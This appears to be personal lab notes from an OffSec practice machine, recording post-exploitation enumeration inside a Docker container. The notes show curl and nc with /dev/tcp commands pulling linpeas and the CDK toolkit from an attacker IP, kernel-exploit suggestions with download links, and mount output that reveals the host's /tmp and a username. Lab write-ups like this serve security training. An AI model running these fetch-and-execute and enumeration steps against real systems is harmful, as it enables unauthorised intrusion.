PEAS
Conducting an automated enumeration after completing manual enumeration of the a7c367c2113d host
www-data@a7c367c2113d:/var/www/html/dev/uploads$ curl -s http://192.168.45.153/linpeas.sh -o ./linpeas.sh ; chmod 755 ./linpeas.shDelivery complete
/Practice/Escape_OffSec/4-Post_Enumeration/attachments/{C426CB07-7900-4E5C-B896-69F22E3503C4}.png)
Executing PEAS
ENV
╔══════════╣ Environment
╚ Any private information inside environment variables?
PHP_EXTRA_CONFIGURE_ARGS=--with-apxs2 --disable-cgi
APACHE_CONFDIR=/etc/apache2
HOSTNAME=a7c367c2113d
PHP_INI_DIR=/usr/local/etc/php
SHLVL=2
PHP_EXTRA_BUILD_DEPS=apache2-dev
PHP_LDFLAGS=-Wl,-O1 -pie
APACHE_RUN_DIR=/var/run/apache2
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
PHP_VERSION=7.2.34
APACHE_PID_FILE=/var/run/apache2/apache2.pid
GPG_KEYS=1729F83938DA44E27BA0F4D3DBDB397470D12172 B1B44D8F021E4E2D6021E995DC9FF8D3EE5AF27F
PHP_ASC_URL=https://www.php.net/distributions/php-7.2.34.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
_=./linpeas.sh
PHP_URL=https://www.php.net/distributions/php-7.2.34.tar.xz
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/dev/uploads
PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
PHP_SHA256=409e11bc6a2c18707dfc44bc61c820ddfd81e17481470f3405ee7822d8379903
APACHE_ENVVARS=/etc/apache2/envvarsCVEs
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-27365] linux-iscsi
Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
probableure: less
Tags: RHEL=8
Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabledContainer
/Practice/Escape_OffSec/4-Post_Enumeration/attachments/{1E8B39AA-366B-40EA-BB82-30600D8057A0}.png)
/Practice/Escape_OffSec/4-Post_Enumeration/attachments/{76EED556-7811-44F9-A026-5F879807F942}.png)
/Practice/Escape_OffSec/4-Post_Enumeration/attachments/{14C32011-788D-46A1-928F-C50922196667}.png)
https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.html
/Practice/Escape_OffSec/4-Post_Enumeration/attachments/{A372A052-809F-498B-95F0-92C06986C6A4}.png)
/Practice/Escape_OffSec/4-Post_Enumeration/attachments/{C6136C2D-781A-4548-BCB7-79C4B32923B4}.png)
Installed Programs
/Practice/Escape_OffSec/4-Post_Enumeration/attachments/{98E79894-DF27-417A-982E-23B450281647}.png)
Interesting Files
/Practice/Escape_OffSec/4-Post_Enumeration/attachments/{304CDAD6-99E6-4741-B34B-82B84CFD2B55}.png)
CDK
┌──(kali㉿kali)-[~/Tools/CDK]
└─$ nc -lvp 2222 < cdk_linux_amd64
listening on [any] 2222 ...
192.168.122.113: inverse host lookup failed: Unknown host
connect to [192.168.45.153] from (UNKNOWN) [192.168.122.113] 51458
www-data@a7c367c2113d:/var/tmp$ cat < /dev/tcp/192.168.45.153/2222 > cdk_linux_amd64
www-data@a7c367c2113d:/var/tmp$ chmod 755 ./cdk_linux_amd64Delivery complete
www-data@a7c367c2113d:/var/tmp$ ./cdk_linux_amd64 evaluate --full
CDK (Container DucK)
CDK Version(GitCommit): b4105424a2f329020c388e6e16a42e9bb31ef501
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
[ Information Gathering - System Info ]
2025/03/06 13:38:05 current dir: /var/tmp
2025/03/06 13:38:05 current user: www-data uid: 33 gid: 33 home: /var/www
2025/03/06 13:38:05 hostname: a7c367c2113d
2025/03/06 13:38:05 debian debian 10.6 kernel: 4.15.0-124-generic
2025/03/06 13:38:05 Setuid files found:
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/bin/mount
/bin/su
/bin/umount
[ Information Gathering - Services ]
[ Information Gathering - Commands and Capabilities ]
2025/03/06 13:38:05 available commands:
curl,find,ps,php,apt,dpkg,apache2,mount,fdisk,gcc,g++,make,base64,perl
2025/03/06 13:38:05 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
CapInh: 00000000a80425fb
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
Cap decode: 0x0000000000000000 =
[*] Maybe you can exploit the Capabilities below:
[ Information Gathering - Mounts ]
0:50 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/BUDBXCXYL5ZM5A5DB7J7ZWE55B:/var/lib/docker/overlay2/l/4OQE4DJPWJUH7C7VTI7QELZTUQ:/var/lib/docker/overlay2/l/ECNWMYCYO5NUARJRHFBATDKEMI:/var/lib/docker/overlay2/l/6Q7MZHH7PE7MTN3HEYZZETOXA7:/var/lib/docker/overlay2/l/UZXOJXED7IKMHDMWIHEVIDWW3S:/var/lib/docker/overlay2/l/47VNHJWJGAVDNPITBTEL3YF3WU:/var/lib/docker/overlay2/l/ZIKR4QHHNZ4FUC5HKQO5AKPJJV:/var/lib/docker/overlay2/l/36JCICUN34CXMZYJRHINKJCJMV:/var/lib/docker/overlay2/l/MRZJMZYWWNTN5KI7RGPZGO5RX7:/var/lib/docker/overlay2/l/4MGJKN7BQ4FWF5WARROCIB7MMD:/var/lib/docker/overlay2/l/HMWQF2AFFQX5EGSQZOASWXGIF3:/var/lib/docker/overlay2/l/T5LFY3YW3TDCXT4SCJ2WGN6L3R:/var/lib/docker/overlay2/l/NAID7JU6N4ZSFAITKDCMLV7IA5:/var/lib/docker/overlay2/l/6KM4XWZJK45UWRE73I4YBP7BVL:/var/lib/docker/overlay2/l/V3KHVVZFP6YUIQATXFIN3VMIVZ,upperdir=/var/lib/docker/overlay2/0b7f49a727ba0e236459b7378729ae4b1840f95444241cc7858afbad904dc82c/diff,workdir=/var/lib/docker/overlay2/0b7f49a727ba0e236459b7378729ae4b1840f95444241cc7858afbad904dc82c/work
0:67 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:68 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:69 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:70 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:71 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
0:29 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,name=systemd
0:31 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu,cpuacct
0:32 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
0:33 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
0:34 / /sys/fs/cgroup/rdma ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,rdma
0:35 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
0:36 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_cls,net_prio
0:37 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
0:38 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
0:39 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
0:40 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
0:41 /docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5 /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
0:66 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:72 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
8:1 /tmp /tmp rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
8:1 /var/lib/docker/containers/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
8:1 /var/lib/docker/containers/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5/hostname /etc/hostname rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
8:1 /var/lib/docker/containers/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5/hosts /etc/hosts rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
8:1 /home/tom/local.txt /var/www/local.txt rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered
0:67 /bus /proc/bus ro,relatime - proc proc rw
0:67 /fs /proc/fs ro,relatime - proc proc rw
0:67 /irq /proc/irq ro,relatime - proc proc rw
0:67 /sys /proc/sys ro,relatime - proc proc rw
0:67 /sysrq-trigger /proc/sysrq-trigger ro,relatime - proc proc rw
0:73 / /proc/acpi ro,relatime - tmpfs tmpfs ro
0:68 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:68 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:68 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:68 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:74 / /proc/scsi ro,relatime - tmpfs tmpfs ro
0:75 / /sys/firmware ro,relatime - tmpfs tmpfs ro
[ Information Gathering - Net Namespace ]
container net namespace isolated.
[ Information Gathering - Sysctl Variables ]
2025/03/06 13:38:05 net.ipv4.conf.all.route_localnet = 0
[ Information Gathering - DNS-Based Service Discovery ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 8.8.4.4:53: read udp 172.17.0.2:34295->8.8.4.4:53: i/o timeout
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 8.8.4.4:53: read udp 172.17.0.2:50258->8.8.4.4:53: i/o timeout
[ Discovery - K8s API Server ]
2025/03/06 13:38:45 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
api-server forbids anonymous request.
response:
[ Discovery - K8s Service Account ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
[ Discovery - Cloud Provider Metadata API ]
2025/03/06 13:38:46 failed to dial Alibaba Cloud API.
2025/03/06 13:38:47 failed to dial Azure API.
2025/03/06 13:38:48 failed to dial Google Cloud API.
2025/03/06 13:38:49 failed to dial Tencent Cloud API.
2025/03/06 13:38:50 failed to dial OpenStack API.
2025/03/06 13:38:51 failed to dial Amazon Web Services (AWS) API.
2025/03/06 13:38:52 failed to dial ucloud API.
[ Exploit Pre - Kernel Exploits ]
2025/03/06 13:38:52 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-27365] linux-iscsi
Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
Exposure: less probable
Tags: RHEL=8
Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[ Information Gathering - Sensitive Files ]
.dockerenv - /.dockerenv
/.bashrc - /etc/skel/.bashrc
[ Information Gathering - ASLR ]
2025/03/06 13:38:57 /proc/sys/kernel/randomize_va_space file content: 2
2025/03/06 13:38:57 ASLR is enabled.
[ Information Gathering - Cgroups ]
2025/03/06 13:38:57 /proc/1/cgroup file content:
12:memory:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
11:perf_event:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
10:hugetlb:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
9:pids:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
8:cpuset:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
7:net_cls,net_prio:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
6:freezer:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
5:rdma:/
4:blkio:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
3:devices:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
2:cpu,cpuacct:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
1:name=systemd:/docker/a7c367c2113df31f4e81e758d6c06b38f902f5ca364dd4a924c70f58660981f5
0::/system.slice/containerd.service
2025/03/06 13:38:57 /proc/self/cgroup file added content (compare pid 1) :Based on the result above, escape does not appear achievable.
/Practice/Escape_OffSec/4-Post_Enumeration/attachments/Pasted-image-20250306161749.png)
However, it’s important to note that the /tmp directory of the host machine is directly mounted to the /tmp directory of the docker host
Additionally, there is a username disclosure; tom